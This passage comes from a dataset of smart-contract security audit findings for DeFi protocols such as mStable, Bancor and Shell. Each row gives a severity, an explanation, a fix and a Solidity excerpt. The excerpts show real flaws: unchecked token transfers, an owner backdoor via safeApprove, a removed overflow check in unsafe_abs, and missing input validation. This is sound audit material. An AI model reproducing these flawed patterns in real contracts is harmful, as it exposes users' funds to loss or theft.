to reduce its vault balance from 100 USD to 0, and (2) the governor subsequently remove the asset. 
During those 29 minutes the asset was collecting interest (according to the lending pool the balance was higher than 100 USD at the time of the swap) that is now “stuck” in the vault.","Consider adding additional input validation (for instance, by requiring the lending pool balance to be 0) or triggering a swap directly when removing an asset from the basket.",,"```\\nrequire(bAsset.vaultBalance == 0, ""bAsset vault must be empty"");\\n```\\n" +Unused parameter in BasketManager._addBasset Won't Fix,low,"It seems like the `_measurementMultiple` parameter is always `StableMath.getRatioScale()` (1e8). There is also some range validation code that seems unnecessary if the parameter is always 1e8.\\n```\\nrequire(\\_measurementMultiple >= 1e6 && \\_measurementMultiple <= 1e10, ""MM out of range"");\\n```\\n",Consider removing the parameter and the input validation to improve the readability of the code.,,"```\\nrequire(\\_measurementMultiple >= 1e6 && \\_measurementMultiple <= 1e10, ""MM out of range"");\\n```\\n" +Assumptions are made about interest distribution Won't Fix,low,"There is a mechanism that prevents interest collection if the extrapolated APY exceeds a threshold (MAX_APY).\\n```\\nrequire(extrapolatedAPY < MAX\\_APY, ""Interest protected from inflating past maxAPY"");\\n```\\n\\nThe extrapolation seems to assume that the interest is paid out frequently and continuously. It seems like a less frequent payout (for instance, once a month/year) could be rejected since the extrapolation considers the interest since the last time that `collectAndDistributeInterest` was called (potentially without interest being collected).","Consider revisiting or documenting this assumption. 
For instance, one could consider extrapolating between the current time and the last time that (non-zero) interest was actually collected.",,"```\\nrequire(extrapolatedAPY < MAX\\_APY, ""Interest protected from inflating past maxAPY"");\\n```\\n" +Assumptions are made about Aave and Compound integrations Acknowledged,low,"The code makes several assumptions about the Aave and Compound integrations. A malicious or malfunctioning integration (or lending pool) might violate those assumptions. This might lead to unintended behavior in the system. Below are three such assumptions:\\nfunction `checkBalance` reverts if the token hasn't been added:\\n```\\nIPlatformIntegration(\\_integration).checkBalance(\\_bAsset);\\n```\\n\\nfunction `withdraw` is trusted to not fail when it shouldn't:\\n```\\nIPlatformIntegration(\\_integrators[i]).withdraw(\\_recipient, bAsset, q, \\_bAssets[i].isTransferFeeCharged);\\n```\\n\\nthe mapping from mAssets to pTokens is fixed:\\n```\\nrequire(bAssetToPToken[\\_bAsset] == address(0), ""pToken already set"");\\n```\\n\\nThe first assumption could be avoided by adding a designated function to check if the token was added.\\nThe second assumption is more difficult to avoid, but should be considered when adding new integrations. The system needs to trust the lending pools to work properly; for instance, if the lending pool would blacklist the integration contract the system may behave in unintended ways.\\nThe third assumption could be avoided, but it comes at a cost.","Consider revisiting or avoiding these assumptions. For any assumptions that are there by design it would be good to document them to facilitate future changes. One should also be careful to avoid coupling between external systems. 
For instance, if withdrawing from Aave fails this should not prevent withdrawing from Compound.",,```\\nIPlatformIntegration(\\_integration).checkBalance(\\_bAsset);\\n```\\n +Assumptions are made about bAssets Acknowledged,low,"The code makes several assumptions about the bAssets that can be used. A malicious or malfunctioning asset contract might violate those assumptions. This might lead to unintended behavior in the system. Below there are several such assumptions:\\nDecimals of a bAsset are constant where the decimals are used to derive the asset's ratio:\\n```\\nuint256 bAsset\\_decimals = CommonHelpers.getDecimals(\\_bAsset);\\n```\\n\\nDecimals must be in a range from 4 to 18:\\n```\\nrequire(decimals >= 4 && decimals <= 18, ""Token must have sufficient decimal places"");\\n```\\n\\nThe governor is able to foresee when transfer fees are charged (which needs to be called if anything changes); in theory, assets could be much more flexible in when transfer fees are charged (for instance, during certain periods or for certain users)\\n```\\nfunction setTransferFeesFlag(address \\_bAsset, bool \\_flag)\\n```\\n\\nIt seems like some of these assumptions could be avoided, but there might be a cost. For instance, one could retrieve the decimals directly instead of “caching” them and one could always enable the setting where transfer fees may be charged.",Consider revisiting or avoiding these assumptions. 
For any assumptions that are there by design it would be good to document them to facilitate future changes.,,```\\nuint256 bAsset\\_decimals = CommonHelpers.getDecimals(\\_bAsset);\\n```\\n +Unused field in ForgePropsMulti struct Won't Fix,low,"The `ForgePropsMulti` struct defines the field `isValid` which always seems to be true:\\n```\\n/\\*\\* @dev All details needed to Forge with multiple bAssets \\*/\\nstruct ForgePropsMulti {\\n bool isValid; // Flag to signify that forge bAssets have passed validity check\\n Basset[] bAssets;\\n address[] integrators;\\n uint8[] indexes;\\n}\\n```\\n\\nIf it is indeed always true, one could remove the following line:\\n```\\nif(!props.isValid) return 0;\\n```\\n",If the field is indeed always true please consider removing it to simplify the code.,,```\\n/\\*\\* @dev All details needed to Forge with multiple bAssets \\*/\\nstruct ForgePropsMulti {\\n bool isValid; // Flag to signify that forge bAssets have passed validity check\\n Basset[] bAssets;\\n address[] integrators;\\n uint8[] indexes;\\n}\\n```\\n +BassetStatus enum defines multiple unused states Won't Fix,low,"The `BassetStatus` enum defines several values that do not seem to be assigned in the code:\\nDefault (different from “Normal”?)\\nBlacklisted\\nLiquidating\\nLiquidated\\nFailed\\n```\\n/\\*\\* @dev Status of the Basset - has it broken its peg? \\*/\\nenum BassetStatus {\\n Default,\\n Normal,\\n BrokenBelowPeg,\\n BrokenAbovePeg,\\n Blacklisted,\\n Liquidating,\\n Liquidated,\\n Failed\\n}\\n```\\n\\nSince some of these are used in the code there might be some dead code that can be removed as a result. For example:\\n```\\n\\_bAsset.status == BassetStatus.Liquidating ||\\n\\_bAsset.status == BassetStatus.Blacklisted\\n```\\n",If those values are indeed never used please consider removing them to simplify the code.,,"```\\n/\\*\\* @dev Status of the Basset - has it broken its peg? 
\\*/\\nenum BassetStatus {\\n Default,\\n Normal,\\n BrokenBelowPeg,\\n BrokenAbovePeg,\\n Blacklisted,\\n Liquidating,\\n Liquidated,\\n Failed\\n}\\n```\\n" +Potential gas savings by terminating early Acknowledged,low,"If a function invocation is bound to revert, one should try to revert as soon as possible to save gas. In `ForgeValidator.validateRedemption` it is possible to terminate more early:\\n```\\nif(atLeastOneBecameOverweight) return (false, ""bAssets must remain below max weight"", false);\\n```\\n","Consider moving the require-statement a few lines up (for instance, after assigning to atLeastOneBecameOverweight).",,"```\\nif(atLeastOneBecameOverweight) return (false, ""bAssets must remain below max weight"", false);\\n```\\n" +Discrepancy between code and comments,low,"There is a discrepancy between the code at:\\n```\\nrequire(weightSum >= 1e18 && weightSum <= 4e18, ""Basket weight must be >= 100 && <= 400%"");\\n```\\n\\nAnd the comment at:\\n```\\n\\* @dev Throws if the total Basket weight does not sum to 100\\n```\\n",Update the code or the comment to be consistent.,,"```\\nrequire(weightSum >= 1e18 && weightSum <= 4e18, ""Basket weight must be >= 100 && <= 400%"");\\n```\\n" +Loss of the liquidity pool is not equally distributed,high,"All stakeholders in the liquidity pool should be able to withdraw the same amount as they staked plus a share of fees that the converter earned during their staking period.\\n```\\n IPoolTokensContainer(anchor).burn(\\_poolToken, msg.sender, \\_amount);\\n\\n // calculate how much liquidity to remove\\n // if the entire supply is liquidated, the entire staked amount should be sent, otherwise\\n // the price is based on the ratio between the pool token supply and the staked balance\\n uint256 reserveAmount = 0;\\n if (\\_amount == initialPoolSupply)\\n reserveAmount = balance;\\n else\\n reserveAmount = \\_amount.mul(balance).div(initialPoolSupply);\\n\\n // sync the reserve balance / staked balance\\n 
reserves[reserveToken].balance = reserves[reserveToken].balance.sub(reserveAmount);\\n uint256 newStakedBalance = stakedBalances[reserveToken].sub(reserveAmount);\\n stakedBalances[reserveToken] = newStakedBalance;\\n```\\n\\nThe problem is that sometimes there might not be enough funds in reserve (for example, due to this issue https://github.com/ConsenSys/bancor-audit-2020-06/issues/4). So the first ones who withdraw their stakes receive all the tokens they own. But the last stakeholders might not be able to get their funds back because the pool is empty already.\\nSo under some circumstances, there is a chance that users can lose all of their staked funds.\\nThis issue also has the opposite side: if the liquidity pool makes an extra profit, the stakers do not owe this profit and cannot withdraw it.","Resolution\\nThe issue was addressed by adding a new fee mechanism called ‘adjusted fees'. This mechanism aims to decrease the deficit of the reserves over time. If there is a deficit of reserves, it is usually present on the secondary token side, because there is a strong incentive to bring the primary token to the balanced state. Roughly speaking, the idea is that if the secondary token has a deficit in reserves, there are additional fees for trading that token. These fees are not distributed across the liquidity providers like the regular fees. Instead, they are just populating the reserve, decreasing the existing deficit.\\nLoss is still not distributed across the liquidity providers, and there is a possibility that there are not enough funds for everyone to withdraw them. 
In the case of a run on reserves, LPs will be able to withdraw funds on a first-come-first-serve basis.\\nDistribute losses evenly across the liquidity providers.",,"```\\n IPoolTokensContainer(anchor).burn(\\_poolToken, msg.sender, \\_amount);\\n\\n // calculate how much liquidity to remove\\n // if the entire supply is liquidated, the entire staked amount should be sent, otherwise\\n // the price is based on the ratio between the pool token supply and the staked balance\\n uint256 reserveAmount = 0;\\n if (\\_amount == initialPoolSupply)\\n reserveAmount = balance;\\n else\\n reserveAmount = \\_amount.mul(balance).div(initialPoolSupply);\\n\\n // sync the reserve balance / staked balance\\n reserves[reserveToken].balance = reserves[reserveToken].balance.sub(reserveAmount);\\n uint256 newStakedBalance = stakedBalances[reserveToken].sub(reserveAmount);\\n stakedBalances[reserveToken] = newStakedBalance;\\n```\\n" +Use of external calls with a fixed amount of gas Won't Fix,medium,"The converter smart contract uses the Solidity transfer() function to transfer Ether.\\n.transfer() and .send() forward exactly 2,300 gas to the recipient. The goal of this hardcoded gas stipend was to prevent reentrancy vulnerabilities, but this only makes sense under the assumption that gas costs are constant. Recently EIP 1884 was included in the Istanbul hard fork. One of the changes included in EIP 1884 is an increase to the gas cost of the SLOAD operation, causing a contract's fallback function to cost more than 2300 gas.\\n```\\n\\_to.transfer(address(this).balance);\\n```\\n\\n```\\nif (\\_targetToken == ETH\\_RESERVE\\_ADDRESS)\\n```\\n\\n```\\nmsg.sender.transfer(reserveAmount);\\n```\\n","Resolution\\nIt was decided to accept this minor risk as the usage of .call() might introduce other unexpected behavior.\\nIt's recommended to stop using .transfer() and .send() and instead use .call(). 
Note that .call() does nothing to mitigate reentrancy attacks, so other precautions must be taken. To prevent reentrancy attacks, it is recommended that you use the checks-effects-interactions pattern.",,```\\n\\_to.transfer(address(this).balance);\\n```\\n +Use of assert statement for input validation,low,"Solidity assertion should only be used to assert invariants, i.e. statements that are expected to always hold if the code behaves correctly. Note that all available gas is consumed when an assert-style exception occurs.\\nIt appears that assert() is used in one location within the test scope to catch invalid user inputs:\\n```\\nassert(amount < targetReserveBalance);\\n```\\n",Use `require()` instead of `assert()`.,,```\\nassert(amount < targetReserveBalance);\\n```\\n +Certain functions lack input validation routines,high,"The functions should first check whether the passed arguments are valid. The checks-effects-interactions pattern should be implemented throughout the code.\\nThese checks should include, but not be limited to:\\n`uint` should be larger than `0` when `0` is considered invalid\\n`uint` should be within constraints\\n`int` should be positive in some cases\\nlength of arrays should match if more arrays are sent as arguments\\naddresses should not be `0x0`\\nThe function `includeAsset` does not do any checks before changing the contract state.\\n```\\nfunction includeAsset (address \\_numeraire, address \\_nAssim, address \\_reserve, address \\_rAssim, uint256 \\_weight) public onlyOwner {\\n shell.includeAsset(\\_numeraire, \\_nAssim, \\_reserve, \\_rAssim, \\_weight);\\n}\\n```\\n\\nThe internal function called by the public method `includeAsset` again doesn't check any of the data.\\n```\\nfunction includeAsset (Shells.Shell storage shell, address \\_numeraire, address \\_numeraireAssim, address \\_reserve, address \\_reserveAssim, uint256 \\_weight) internal {\\n\\n Assimilators.Assimilator storage 
shell.assimilators[\\_numeraire];\\n\\n \\_numeraireAssimilator.addr = \\_numeraireAssim;\\n\\n \\_numeraireAssimilator.ix = uint8(shell.numeraires.length);\\n\\n shell.numeraires.push(\\_numeraireAssimilator);\\n\\n Assimilators.Assimilator storage \\_reserveAssimilator = shell.assimilators[\\_reserve];\\n\\n \\_reserveAssimilator.addr = \\_reserveAssim;\\n\\n \\_reserveAssimilator.ix = uint8(shell.reserves.length);\\n\\n shell.reserves.push(\\_reserveAssimilator);\\n\\n shell.weights.push(\\_weight.divu(1e18).add(uint256(1).divu(1e18)));\\n\\n}\\n```\\n\\nSimilar with `includeAssimilator`.\\n```\\nfunction includeAssimilator (address \\_numeraire, address \\_derivative, address \\_assimilator) public onlyOwner {\\n shell.includeAssimilator(\\_numeraire, \\_derivative, \\_assimilator);\\n}\\n```\\n\\nAgain no checks are done in any function.\\n```\\nfunction includeAssimilator (Shells.Shell storage shell, address \\_numeraire, address \\_derivative, address \\_assimilator) internal {\\n\\n Assimilators.Assimilator storage \\_numeraireAssim = shell.assimilators[\\_numeraire];\\n\\n shell.assimilators[\\_derivative] = Assimilators.Assimilator(\\_assimilator, \\_numeraireAssim.ix);\\n // shell.assimilators[\\_derivative] = Assimilators.Assimilator(\\_assimilator, \\_numeraireAssim.ix, 0, 0);\\n\\n}\\n```\\n\\nNot only does the administrator functions not have any checks, but also user facing functions do not check the arguments.\\nFor example `swapByOrigin` does not check any of the arguments if you consider it calls `MainnetDaiToDaiAssimilator`.\\n```\\nfunction swapByOrigin (address \\_o, address \\_t, uint256 \\_oAmt, uint256 \\_mTAmt, uint256 \\_dline) public notFrozen returns (uint256 tAmt\\_) {\\n\\n return transferByOrigin(\\_o, \\_t, \\_dline, \\_mTAmt, \\_oAmt, msg.sender);\\n\\n}\\n```\\n\\nIt calls `transferByOrigin` and we simplify this example and consider we have `_o.ix == _t.ix`\\n```\\nfunction transferByOrigin (address \\_origin, address \\_target, 
uint256 \\_dline, uint256 \\_mTAmt, uint256 \\_oAmt, address \\_rcpnt) public notFrozen nonReentrant returns (uint256 tAmt\\_) {\\n\\n Assimilators.Assimilator memory \\_o = shell.assimilators[\\_origin];\\n Assimilators.Assimilator memory \\_t = shell.assimilators[\\_target];\\n\\n // TODO: how to include min target amount\\n if (\\_o.ix == \\_t.ix) return \\_t.addr.outputNumeraire(\\_rcpnt, \\_o.addr.intakeRaw(\\_oAmt));\\n```\\n\\nIn which case it can call 2 functions on an assimilatior such as `MainnetDaiToDaiAssimilator`.\\nThe first called function is `intakeRaw`.\\n```\\n// transfers raw amonut of dai in, wraps it in cDai, returns numeraire amount\\nfunction intakeRaw (uint256 \\_amount) public returns (int128 amount\\_, int128 balance\\_) {\\n\\n dai.transferFrom(msg.sender, address(this), \\_amount);\\n\\n amount\\_ = \\_amount.divu(1e18);\\n\\n}\\n```\\n\\nAnd its result is used in `outputNumeraire` that again does not have any checks.\\n```\\n// takes numeraire amount of dai, unwraps corresponding amount of cDai, transfers that out, returns numeraire amount\\nfunction outputNumeraire (address \\_dst, int128 \\_amount) public returns (uint256 amount\\_) {\\n\\n amount\\_ = \\_amount.mulu(1e18);\\n\\n dai.transfer(\\_dst, amount\\_);\\n\\n return amount\\_;\\n\\n}\\n```\\n",Resolution\\nComment from the development team:\\nNow all functions in the Orchestrator revert on incorrect arguments.\\nAll functions in Loihi in general revert on incorrect arguments.\\nImplement the `checks-effects-interactions` as a pattern to write code. 
Add tests that check if all of the arguments have been validated.\\nConsider checking arguments as an important part of writing code and developing the system.,,"```\\nfunction includeAsset (address \\_numeraire, address \\_nAssim, address \\_reserve, address \\_rAssim, uint256 \\_weight) public onlyOwner {\\n shell.includeAsset(\\_numeraire, \\_nAssim, \\_reserve, \\_rAssim, \\_weight);\\n}\\n```\\n" +Remove Loihi methods that can be used as backdoors by the administrator,high,"There are several functions in `Loihi` that give extreme powers to the shell administrator. The most dangerous set of those is the ones granting the capability to add assimilators.\\nSince assimilators are essentially a proxy architecture to delegate code to several different implementations of the same interface, the administrator could, intentionally or unintentionally, deploy malicious or faulty code in the implementation of an assimilator. This means that the administrator is essentially totally trusted to not run code that, for example, drains the whole pool or locks up the users' and LPs' tokens.\\nIn addition to these, the function `safeApprove` allows the administrator to move any of the tokens the contract holds to any address regardless of the balances any of the users have.\\nThis can also be used by the owner as a backdoor to completely drain the contract.\\n```\\nfunction safeApprove(address \\_token, address \\_spender, uint256 \\_value) public onlyOwner {\\n\\n (bool success, bytes memory returndata) = \\_token.call(abi.encodeWithSignature(""approve(address,uint256)"", \\_spender, \\_value));\\n\\n require(success, ""SafeERC20: low-level call failed"");\\n\\n}\\n```\\n","Remove the `safeApprove` function and, instead, use a trustless escape-hatch mechanism like the one suggested in issue 6.1.\\nFor the assimilator addition functions, our recommendation is that they are made completely internal, only callable in the constructor, at deploy time.\\nEven though this is not a big 
structural change (in fact, it reduces the attack surface), it is, indeed, a feature loss. However, this is the only way to make each shell a time-invariant system.\\nThis would not only increase Shell's security but also would greatly improve the trust the users have in the protocol since, after deployment, the code is now static and auditable.",,"```\\nfunction safeApprove(address \\_token, address \\_spender, uint256 \\_value) public onlyOwner {\\n\\n (bool success, bytes memory returndata) = \\_token.call(abi.encodeWithSignature(""approve(address,uint256)"", \\_spender, \\_value));\\n\\n require(success, ""SafeERC20: low-level call failed"");\\n\\n}\\n```\\n" +Assimilators should implement an interface,high,"The Assimilators are one of the core components within the application. They are used to move the tokens and can be thought of as a “middleware” between the Shell Protocol application and any other supported tokens.\\nThe methods attached to the assimilators are called throughout the application and they are a critical component of the whole system. Because of this fact, it is extremely important that they behave correctly.\\nA suggestion to restrict the possibility of errors when implementing them and when using them is to make all of the assimilators implement a unique specific interface. This way, any deviation would be immediately observed, right when the compilation happens.\\nConsider this example. The user calls `swapByOrigin`.\\n```\\nfunction swapByOrigin (address \\_o, address \\_t, uint256 \\_oAmt, uint256 \\_mTAmt, uint256 \\_dline) public notFrozen returns (uint256 tAmt\\_) {\\n\\n return transferByOrigin(\\_o, \\_t, \\_dline, \\_mTAmt, \\_oAmt, msg.sender);\\n\\n}\\n```\\n\\nWhich calls `transferByOrigin`. 
In `transferByOrigin`, if the origin index matches the target index, a different execution branch is activated.\\n```\\nif (\\_o.ix == \\_t.ix) return \\_t.addr.outputNumeraire(\\_rcpnt, \\_o.addr.intakeRaw(\\_oAmt));\\n```\\n\\nIn this case we need the output of `_o.addr.intakeRaw(_oAmt)`.\\nIf we pick a random assimilator and check the implementation, we see the function `intakeRaw` needs to return the transferred amount.\\n```\\n// takes raw cdai amount, transfers it in, calculates corresponding numeraire amount and returns it\\nfunction intakeRaw (uint256 \\_amount) public returns (int128 amount\\_) {\\n\\n bool success = cdai.transferFrom(msg.sender, address(this), \\_amount);\\n\\n if (!success) revert(""CDai/transferFrom-failed"");\\n\\n uint256 \\_rate = cdai.exchangeRateStored();\\n\\n \\_amount = ( \\_amount \\* \\_rate ) / 1e18;\\n\\n cdai.redeemUnderlying(\\_amount);\\n\\n amount\\_ = \\_amount.divu(1e18);\\n\\n}\\n```\\n\\nHowever, with other implementations, the returns do not match. 
In the case of `MainnetDaiToDaiAssimilator`, it returns 2 values, which will make the `Loihi` contract work in this case but can misbehave in other cases, or even fail.\\n```\\n// transfers raw amonut of dai in, wraps it in cDai, returns numeraire amount\\nfunction intakeRaw (uint256 \\_amount) public returns (int128 amount\\_, int128 balance\\_) {\\n\\n dai.transferFrom(msg.sender, address(this), \\_amount);\\n\\n amount\\_ = \\_amount.divu(1e18);\\n\\n}\\n```\\n\\nMaking all the assimilators implement one unique interface will enforce the functions to look the same from the outside.",Create a unique interface for the assimilators and make all the contracts implement that interface.,,"```\\nfunction swapByOrigin (address \\_o, address \\_t, uint256 \\_oAmt, uint256 \\_mTAmt, uint256 \\_dline) public notFrozen returns (uint256 tAmt\\_) {\\n\\n return transferByOrigin(\\_o, \\_t, \\_dline, \\_mTAmt, \\_oAmt, msg.sender);\\n\\n}\\n```\\n" +Assimilators do not conform to the ERC20 specification,medium,"The assimilators in the codebase make heavy usage of both the `transfer` and `transferFrom` methods in the ERC20 standard.\\nQuoting the relevant parts of the specification of the standard:\\nTransfers _value amount of tokens to address _to, and MUST fire the Transfer event. The function SHOULD throw if the message caller's account balance does not have enough tokens to spend.\\nThe transferFrom method is used for a withdraw workflow, allowing contracts to transfer tokens on your behalf. This can be used for example to allow a contract to transfer tokens on your behalf and/or to charge fees in sub-currencies. 
The function SHOULD throw unless the _from account has deliberately authorized the sender of the message via some mechanism.\\nWe can see that, even though it is suggested that ERC20-compliant tokens do `throw` on the lack of authorization from the sender or lack of funds to complete the transfer, the standard does not enforce it.\\nThis means that, in order to make the system both more resilient and future-proof, code in each implementation of current and future assimilators should check for the return value of both `transfer` and `transferFrom` call instead of just relying on the external contract to revert execution.\\nThe extent of this issue is only mitigated by the fact that new assets are only added by the shell administrator and could, therefore, be audited prior to their addition.\\nNon-exhaustive Examples\\n```\\ndai.transferFrom(msg.sender, address(this), \\_amount);\\n```\\n\\n```\\ndai.transfer(\\_dst, \\_amount);\\n```\\n","Add a check for the return boolean of the function.\\nExample:\\n`require(dai.transferFrom(msg.sender, address(this), _amount) == true);`",,"```\\ndai.transferFrom(msg.sender, address(this), \\_amount);\\n```\\n" +Access to assimilators does not check for existence and allows delegation to the zeroth address,medium,"For every method that allows to selectively withdraw, deposit, or swap tokens in `Loihi`, the user is allowed to specify addresses for the assimilators of said tokens (by inputting the addresses of the tokens themselves).\\nThe shell then performs a lookup on a mapping called `assimilators` inside its main structure and uses the result of that lookup to delegate call the assimilator deployed by the shell administrator.\\nHowever, there are no checks for prior instantiation of a specific, supported token, effectively meaning that we can do a lookup on an all-zeroed-out member of that mapping and delegate call execution to the zeroth address.\\nFor example, the 32 bytes expected as a result of this call:\\n```\\nfunction 
viewNumeraireAmount (address \\_assim, uint256 \\_amt) internal returns (int128 amt\\_) {\\n\\n // amount\\_ = IAssimilator(\\_assim).viewNumeraireAmount(\\_amt); // for production\\n\\n bytes memory data = abi.encodeWithSelector(iAsmltr.viewNumeraireAmount.selector, \\_amt); // for development\\n\\n amt\\_ = abi.decode(\\_assim.delegate(data), (int128)); // for development\\n\\n}\\n```\\n\\nThis is definitely an insufficient check since the interface for the assimilators might change in the future to include functions that have no return values.",Check for the prior instantiation of assimilators by including the following requirement:\\n`require(shell.assimilators[].ix != 0);`\\nIn all the functions that access the `assimilators` mapping and change the indexes to be 1-based instead pf 0-based.,,"```\\nfunction viewNumeraireAmount (address \\_assim, uint256 \\_amt) internal returns (int128 amt\\_) {\\n\\n // amount\\_ = IAssimilator(\\_assim).viewNumeraireAmount(\\_amt); // for production\\n\\n bytes memory data = abi.encodeWithSelector(iAsmltr.viewNumeraireAmount.selector, \\_amt); // for development\\n\\n amt\\_ = abi.decode(\\_assim.delegate(data), (int128)); // for development\\n\\n}\\n```\\n" +Math library's fork has problematic changes,medium,"The math library ABDK Libraries for Solidity was forked and modified to add a few `unsafe_*` functions.\\n`unsafe_add`\\n`unsafe_sub`\\n`unsafe_mul`\\n`unsafe_div`\\n`unsafe_abs`\\nThe problem which was introduced is that `unsafe_add` ironically is not really unsafe, it is as safe as the original `add` function. It is, in fact, identical to the safe `add` function.\\n```\\n/\\*\\*\\n \\* Calculate x + y. 
Revert on overflow.\\n \\*\\n \\* @param x signed 64.64-bit fixed point number\\n \\* @param y signed 64.64-bit fixed point number\\n \\* @return signed 64.64-bit fixed point number\\n \\*/\\nfunction add (int128 x, int128 y) internal pure returns (int128) {\\n int256 result = int256(x) + y;\\n require (result >= MIN\\_64x64 && result <= MAX\\_64x64);\\n return int128 (result);\\n}\\n```\\n\\n```\\n/\\*\\*\\n \\* Calculate x + y. Revert on overflow.\\n \\*\\n \\* @param x signed 64.64-bit fixed point number\\n \\* @param y signed 64.64-bit fixed point number\\n \\* @return signed 64.64-bit fixed point number\\n \\*/\\nfunction unsafe\\_add (int128 x, int128 y) internal pure returns (int128) {\\n int256 result = int256(x) + y;\\n require (result >= MIN\\_64x64 && result <= MAX\\_64x64);\\n return int128 (result);\\n}\\n```\\n\\nFortunately, `unsafe_add` is not used anywhere in the code.\\nHowever, `unsafe_abs` was changed from this:\\n```\\n/\\*\\*\\n \\* Calculate |x|. Revert on overflow.\\n \\*\\n \\* @param x signed 64.64-bit fixed point number\\n \\* @return signed 64.64-bit fixed point number\\n \\*/\\nfunction abs (int128 x) internal pure returns (int128) {\\n require (x != MIN\\_64x64);\\n return x < 0 ? -x : x;\\n}\\n```\\n\\nTo this:\\n```\\n/\\*\\*\\n \\* Calculate |x|. Revert on overflow.\\n \\*\\n \\* @param x signed 64.64-bit fixed point number\\n \\* @return signed 64.64-bit fixed point number\\n \\*/\\nfunction unsafe\\_abs (int128 x) internal pure returns (int128) {\\n return x < 0 ? 
-x : x;\\n}\\n```\\n\\nThe check that was removed, is actually an important check:\\n```\\nrequire (x != MIN\\_64x64);\\n```\\n\\n```\\nint128 private constant MIN\\_64x64 = -0x80000000000000000000000000000000;\\n```\\n\\nThe problem is that for an `int128` variable that is equal to `-0x80000000000000000000000000000000`, there is no absolute value within the constraints of `int128`.\\nStarting from int128 `n` = `-0x80000000000000000000000000000000`, the absolute value should be int128 `abs_n` = -n, however `abs_n` is equal to the initial value of `n`. The final value of `abs_n` is still `-0x80000000000000000000000000000000`. It's still not a positive or zero value. The operation `0 - n` wraps back to the same initial value.","Remove unused `unsafe_*` functions and try to find other ways of doing unsafe math (if it is fundamentally important) without changing existing, trusted, already audited code.",,"```\\n/\\*\\*\\n \\* Calculate x + y. Revert on overflow.\\n \\*\\n \\* @param x signed 64.64-bit fixed point number\\n \\* @param y signed 64.64-bit fixed point number\\n \\* @return signed 64.64-bit fixed point number\\n \\*/\\nfunction add (int128 x, int128 y) internal pure returns (int128) {\\n int256 result = int256(x) + y;\\n require (result >= MIN\\_64x64 && result <= MAX\\_64x64);\\n return int128 (result);\\n}\\n```\\n" +Use one file for each contract or library,medium,"The repository contains a lot of contracts and libraries that are added in the same file as another contract or library.\\nOrganizing the code in this manner makes it hard to navigate, develop and audit. It is a best practice to have each contract or library in its own file. 
The file also needs to bear the name of the hosted contract or library.\\n```\\nlibrary SafeERC20Arithmetic {\\n```\\n\\n```\\nlibrary Shells {\\n```\\n\\n```\\ncontract ERC20Approve {\\n function approve (address spender, uint256 amount) public returns (bool);\\n}\\n```\\n\\n```\\ncontract Loihi is LoihiRoot {\\n```\\n\\n```\\nlibrary Delegate {\\n```\\n\\n```\\nlibrary Assimilators {\\n```\\n",Split up contracts and libraries in single files.,,```\\nlibrary SafeERC20Arithmetic {\\n```\\n +Remove debugging code from the repository,medium,"Throughout the repository, there is source code from the development stage that was used for debugging the functionality and was not removed.\\nThis should not be present in the source code and even if they are used while functionality is developed, they should be removed after the functionality was implemented.\\n```\\nevent log(bytes32);\\nevent log\\_int(bytes32, int256);\\nevent log\\_ints(bytes32, int256[]);\\nevent log\\_uint(bytes32, uint256);\\nevent log\\_uints(bytes32, uint256[]);\\n```\\n\\n```\\nevent log(bytes32);\\nevent log\\_uint(bytes32, uint256);\\nevent log\\_int(bytes32, int256);\\n```\\n\\n```\\nevent log(bytes32);\\nevent log\\_int(bytes32, int128);\\nevent log\\_int(bytes32, int);\\nevent log\\_uint(bytes32, uint);\\nevent log\\_addr(bytes32, address);\\n```\\n\\n```\\nevent log(bytes32);\\n```\\n\\n```\\nevent log(bytes32);\\nevent log\\_int(bytes32, int256);\\nevent log\\_ints(bytes32, int256[]);\\nevent log\\_uint(bytes32, uint256);\\nevent log\\_uints(bytes32, uint256[]);\\n```\\n\\n```\\nevent log\\_int(bytes32, int);\\nevent log\\_ints(bytes32, int128[]);\\nevent log\\_uint(bytes32, uint);\\nevent log\\_uints(bytes32, uint[]);\\nevent log\\_addrs(bytes32, address[]);\\n```\\n\\n```\\nevent log\\_uint(bytes32, uint256);\\nevent log\\_int(bytes32, int256);\\n```\\n\\n```\\nevent log\\_uint(bytes32, uint256);\\n```\\n\\n```\\nshell.testHalts = true;\\n```\\n\\n```\\nfunction setTestHalts (bool 
\\_testOrNotToTest) public {\\n\\n shell.testHalts = \\_testOrNotToTest;\\n\\n}\\n```\\n\\n```\\nbool testHalts;\\n```\\n",Remove the debug functionality at the end of the development cycle of each functionality.,,"```\\nevent log(bytes32);\\nevent log\\_int(bytes32, int256);\\nevent log\\_ints(bytes32, int256[]);\\nevent log\\_uint(bytes32, uint256);\\nevent log\\_uints(bytes32, uint256[]);\\n```\\n" +Remove commented out code from the repository,medium,"Having commented out code increases the cognitive load on an already complex system. Also, it hides the important parts of the system that should get the proper attention, but that attention gets to be diluted.\\nThere is no code that is important enough to be left commented out in a repository. Git branching should take care of having different code versions or diffs should show what was before.\\nIf there is commented out code, this also has to be maintained; it will be out of date if other parts of the system are changed, and the tests will not pick that up.\\nThe main problem is that commented code adds confusion with no real benefit. 
Code should be code, and comments should be comments.\\nCommented out code should be removed or dealt with in a separate branch that is later included in the master branch.\\n```\\nfunction viewRawAmount (address \\_assim, int128 \\_amt) internal returns (uint256 amount\\_) {\\n\\n // amount\\_ = IAssimilator(\\_assim).viewRawAmount(\\_amt); // for production\\n\\n bytes memory data = abi.encodeWithSelector(iAsmltr.viewRawAmount.selector, \\_amt.abs()); // for development\\n\\n amount\\_ = abi.decode(\\_assim.delegate(data), (uint256)); // for development\\n\\n}\\n```\\n\\n```\\nfunction viewNumeraireAmount (address \\_assim, uint256 \\_amt) internal returns (int128 amt\\_) {\\n\\n // amount\\_ = IAssimilator(\\_assim).viewNumeraireAmount(\\_amt); // for production\\n\\n bytes memory data = abi.encodeWithSelector(iAsmltr.viewNumeraireAmount.selector, \\_amt); // for development\\n\\n amt\\_ = abi.decode(\\_assim.delegate(data), (int128)); // for development\\n\\n}\\n```\\n\\n```\\nfunction viewNumeraireAmount (address \\_assim, uint256 \\_amt) internal returns (int128 amt\\_) {\\n\\n // amount\\_ = IAssimilator(\\_assim).viewNumeraireAmount(\\_amt); // for production\\n\\n bytes memory data = abi.encodeWithSelector(iAsmltr.viewNumeraireAmount.selector, \\_amt); // for development\\n\\n amt\\_ = abi.decode(\\_assim.delegate(data), (int128)); // for development\\n\\n}\\n```\\n\\n```\\nfunction includeAssimilator (Shells.Shell storage shell, address \\_numeraire, address \\_derivative, address \\_assimilator) internal {\\n\\n Assimilators.Assimilator storage \\_numeraireAssim = shell.assimilators[\\_numeraire];\\n\\n shell.assimilators[\\_derivative] = Assimilators.Assimilator(\\_assimilator, 